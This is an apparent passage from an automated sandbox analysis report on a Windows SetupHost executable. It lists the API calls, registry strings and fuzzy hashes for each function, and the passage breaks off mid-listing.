                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 009BD0D7
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetLastError.KERNEL32(?,00000000), ref: 009BD0E1
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: RegCloseKey.ADVAPI32(?), ref: 009BD13F
                                                                                                                                                                                                                • RegSetValueExW.KERNEL32 ref: 009BB3AB
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009BB3E0
                                                                                                                                                                                                                  • Part of subcall function 009B9D9C: EtwEventEnabled.NTDLL(?,?,009BBC0D), ref: 009B9E13
                                                                                                                                                                                                                  • Part of subcall function 009B9D9C: EtwEventWrite.NTDLL(?,?,009BBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 009B9E3B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SYSTEM\Setup\MoSetup\Volatile, xrefs: 009BB372
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseEventProcess$CurrentEnabledErrorLastValueWow64Write
                                                                                                                                                                                                                • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                                                                                                                • API String ID: 414203747-1711884389
                                                                                                                                                                                                                • Opcode ID: 6fec19e475d505cfeabefbe9d57b1dabec0cb76b37c40ce4c0f67fb487ed5191
                                                                                                                                                                                                                • Instruction ID: ff74acc88f9724a03727babfdc98e99ac4b8f0f4c0ecd02feeedca22294dc1d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fec19e475d505cfeabefbe9d57b1dabec0cb76b37c40ce4c0f67fb487ed5191
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A017571A0020DFBDF01EFA5D985AEEBBBAEFC0364F104069F50597191DB719E059B50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 009BC6F0
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009BC72B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 009BC6E4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpen
                                                                                                                                                                                                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                • API String ID: 47109696-2278330950
                                                                                                                                                                                                                • Opcode ID: 560424e7eb5b27d4fd7521689e9810d61f02e344197c2c6f47b3d17adb762144
                                                                                                                                                                                                                • Instruction ID: 209f31c8aa8b98dce6ea4279a71a16a86f6ab236537d9b6b7a2c99ce6c7605c6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 560424e7eb5b27d4fd7521689e9810d61f02e344197c2c6f47b3d17adb762144
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57013C70920218FBCF14EF95DA85ADEBBB9EF88724F10805AF801A7290DB709F41DB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00A0A1E5: RegGetValueW.KERNEL32(80000002,?,ETag,00000002,00000000,00000000,00000000), ref: 00A0A260
                                                                                                                                                                                                                  • Part of subcall function 00A0A1E5: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 00A0A30E
                                                                                                                                                                                                                  • Part of subcall function 00A0A1E5: HeapFree.KERNEL32(00000000,?,?), ref: 00A0A315
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,00A094E2,00000001,00000000,00000001,00000000,00000000), ref: 00A09486
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A094E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A0948D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,00A094E2,00000001,00000000,00000001,00000000,00000000), ref: 00A094B0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A094E2), ref: 00A094B7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$AllocValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2792325425-0
                                                                                                                                                                                                                • Opcode ID: aa00a5754ffb7b45218d67e9fe60207634e75b1c48c8dc22ad97e2ac13d44610
                                                                                                                                                                                                                • Instruction ID: dcdc1baafdef77661153628773a1b55bb039fc689df22e2f090bfbdce380ed3c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa00a5754ffb7b45218d67e9fe60207634e75b1c48c8dc22ad97e2ac13d44610
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC118676B00318ABC710DF94E8C4BAFBB7DEBC9B54F108159B91597281DB719D02C7A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00A02E53: __EH_prolog3.LIBCMT ref: 00A02E5A
                                                                                                                                                                                                                  • Part of subcall function 00A02E53: memset.MSVCRT ref: 00A02EDA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00002420,?,?,00000000), ref: 00A02F90
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 00A02F97
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A02FB5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapmemset$AllocateH_prolog3Process
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 666435912-0
                                                                                                                                                                                                                • Opcode ID: b8843c441b28cb061e7fe29c235ffd2318997b20cad805b8b5c065451f647a5d
                                                                                                                                                                                                                • Instruction ID: 3b80184fa548bca4e19b26f976f3551b0449bf6b94e9250ce562bb845902d0ab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8843c441b28cb061e7fe29c235ffd2318997b20cad805b8b5c065451f647a5d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4141A271A013099FDF18DF69D984AAEBBF9FF88340F14816AE805972C2DB74CA41CB54
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00A02C3B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000004,00A03042,00000000), ref: 00A02C77
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A02C7E
                                                                                                                                                                                                                  • Part of subcall function 00A02CF4: __EH_prolog3.LIBCMT ref: 00A02CFB
                                                                                                                                                                                                                  • Part of subcall function 00A02CF4: GetProcessHeap.KERNEL32(00000000,009816E8,?,0000000C,009816E8,Function_00081710,00000000,00A03461,00A12888,00000014,00A04655,23FAFFD7,0052AD90,00000000,00000000,00A11195), ref: 00A02D22
                                                                                                                                                                                                                  • Part of subcall function 00A02CF4: HeapFree.KERNEL32(00000000,?,00A0022D), ref: 00A02D29
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$H_prolog3Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4208486406-0
                                                                                                                                                                                                                • Opcode ID: e87e451ad3ff725069738d54bd9040b1c58bd9611c53acceb8c2a4bee5f7f5f2
                                                                                                                                                                                                                • Instruction ID: 85ed60e628250cf77137851e03c56f00fe21910c150d162b5e4269651e89eb1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e87e451ad3ff725069738d54bd9040b1c58bd9611c53acceb8c2a4bee5f7f5f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F21160B1B4031AAFEF10DFB4AD99B6E66A4BB08744F044939B606EB2C1D670D8408B94
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,?,?,009B8959,00000000,0000000C,009ACD31,00000000), ref: 009BB09C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                • Opcode ID: 9831bdb38c5ab510657d4f6dcb5942c93f78688e3b7ca73e0f5778ce303159e8
                                                                                                                                                                                                                • Instruction ID: ac6f2f1a65636cdf7572e237eb9654ddf8248a294cfd0ef860b47b76256f3848
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9831bdb38c5ab510657d4f6dcb5942c93f78688e3b7ca73e0f5778ce303159e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D11C271700214ABCB15BBB58A94BFF76699BC4770F10442DBA2697285EFB59D018290
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BD14E: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000), ref: 009BD18D
                                                                                                                                                                                                                  • Part of subcall function 009BD14E: IsWow64Process.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 009BD194
                                                                                                                                                                                                                  • Part of subcall function 009BD14E: GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000), ref: 009BD19E
                                                                                                                                                                                                                  • Part of subcall function 009BD14E: RegCloseKey.ADVAPI32(00000000), ref: 009BD210
                                                                                                                                                                                                                • RegSetKeySecurity.ADVAPI32(00000000,00000004,00000000), ref: 009BB31D
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 009BB34D
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 009BB35C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseProcess$CurrentErrorFreeLastLocalSecurityWow64
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3952319208-0
                                                                                                                                                                                                                • Opcode ID: 0dedfa16f18a8a804018e89dce2446626172800bfe5f6d8275ad85664346a88c
                                                                                                                                                                                                                • Instruction ID: f66766035807382281b3c6f13e42454041fa3920800647993c489d39ee37b41f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dedfa16f18a8a804018e89dce2446626172800bfe5f6d8275ad85664346a88c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E119431905109EBDF15DBA9CE49BFEB7BAEBC0320F244055E512A21D0DBB49E42DB10
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000002), ref: 00A05433
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000002), ref: 00A05459
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000001,?,?,?,00000000,00000000,00000002), ref: 00A05466
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                • Opcode ID: 9160763caf292ed96979abb70268602d6dbd84fecbb1aaef26996c17d47ea945
                                                                                                                                                                                                                • Instruction ID: c964d50bd119a4b49580f6dbf83414b6a69365ff54af6baf4e06e45971653d8c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9160763caf292ed96979abb70268602d6dbd84fecbb1aaef26996c17d47ea945
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCF0F631A44518ABDB1497B4FC4CBDF3B7AEB85722F244520F512D61E0CAA29C428E94
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • UuidCreate.RPCRT4(?), ref: 009A1F0C
                                                                                                                                                                                                                  • Part of subcall function 009BCD57: memset.MSVCRT ref: 009BCD9B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateUuidmemset
                                                                                                                                                                                                                • String ID: A
                                                                                                                                                                                                                • API String ID: 4176883543-3554254475
                                                                                                                                                                                                                • Opcode ID: f0a0181071a838efa03c4acd9b9343aee64c5f30ff590e67d8a1cc97aca21ff8
                                                                                                                                                                                                                • Instruction ID: 11cc2c7ae69c3e8eff22d629f1ae6bef050d03b5d941324f68f475610bf062a0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0a0181071a838efa03c4acd9b9343aee64c5f30ff590e67d8a1cc97aca21ff8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04F0E976700508ABDB01EFBCC9458EFBBFAEF89310B100479A901E7251C970AE0986B2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s
                                                                                                                                                                                                                • API String ID: 0-620797490
                                                                                                                                                                                                                • Opcode ID: 139c9ae00cd4fb1e44f3dec6eb18e79d50455b93627c2b5ab539bf50cd9d5b00
                                                                                                                                                                                                                • Instruction ID: 0929260c31f7b99455bd22b95a97e8a8221f5a711a190445d12f860e2538d1a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 139c9ae00cd4fb1e44f3dec6eb18e79d50455b93627c2b5ab539bf50cd9d5b00
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEF01231650108FBDB04EBA1D757BDD77B5EBC1368F208059F50696291EF759F04A780
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 747782440-0
                                                                                                                                                                                                                • Opcode ID: ac215aa969db5b502e290de477c5017ee61896ffc401d82c950a48875c4b8154
                                                                                                                                                                                                                • Instruction ID: e2d1d48543bc0f34253f9aa5998d90a49a955bbc836baf1d76e265777e85cb2e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac215aa969db5b502e290de477c5017ee61896ffc401d82c950a48875c4b8154
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 792183B190031A9BCB08DF94D995AAFB7B9FF44700F10852AE5519B391D7B0DA50CFD0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BC7BE: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?), ref: 009BC90E
                                                                                                                                                                                                                  • Part of subcall function 009BC7BE: HeapFree.KERNEL32(00000000), ref: 009BC915
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009B9AE3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcessmemcpy
                                                                                                                                                                                                                • String ID: Tel#Asmv
                                                                                                                                                                                                                • API String ID: 993092371-2294149968
                                                                                                                                                                                                                • Opcode ID: 0eb6d58830fa03d831a66d2cfcb9c77943247600fde16e7bf8e1d3432f19905c
                                                                                                                                                                                                                • Instruction ID: 1386eab3b54acbb99e89984b9afc99c3b4edbd7e9afc3bea054004aa0149ac25
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0eb6d58830fa03d831a66d2cfcb9c77943247600fde16e7bf8e1d3432f19905c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0901D2B1B10525AB8B15EB69CAD1E9EB76ADFD4B607000129FA058B342DF70ED01C7D0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A01FCA
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00A027B4,?,00000001,00A12740,0000003C,00A027B4), ref: 00A01FEF
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02010
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02031
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetCurrentThread.KERNEL32(00000008,00000001,00A12740,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02047
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0204E
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetLastError.KERNEL32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A02058
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetCurrentProcess.KERNEL32(00000008,00A12740,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0206F
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02076
                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE ref: 00A0283E
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A0285C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize$Allocate$CurrentErrorLastOpenProcessThreadToken$CreateDescriptorFileMappingSecurity
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2809032385-0
                                                                                                                                                                                                                • Opcode ID: 512d7a945d03b78987d155dbfcfee02f8a0fdce1e339976b285175e826b3ac30
                                                                                                                                                                                                                • Instruction ID: 40e4f7b1aac64c3d558c3a2bcadd12a78f5c3ff3c6b97f61101bdab7167adade
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 512d7a945d03b78987d155dbfcfee02f8a0fdce1e339976b285175e826b3ac30
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E601843BA00319ABCB119FF99848BEEBBB4EB58761F108129A915E31C0D63499058B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A01FCA
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00A027B4,?,00000001,00A12740,0000003C,00A027B4), ref: 00A01FEF
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02010
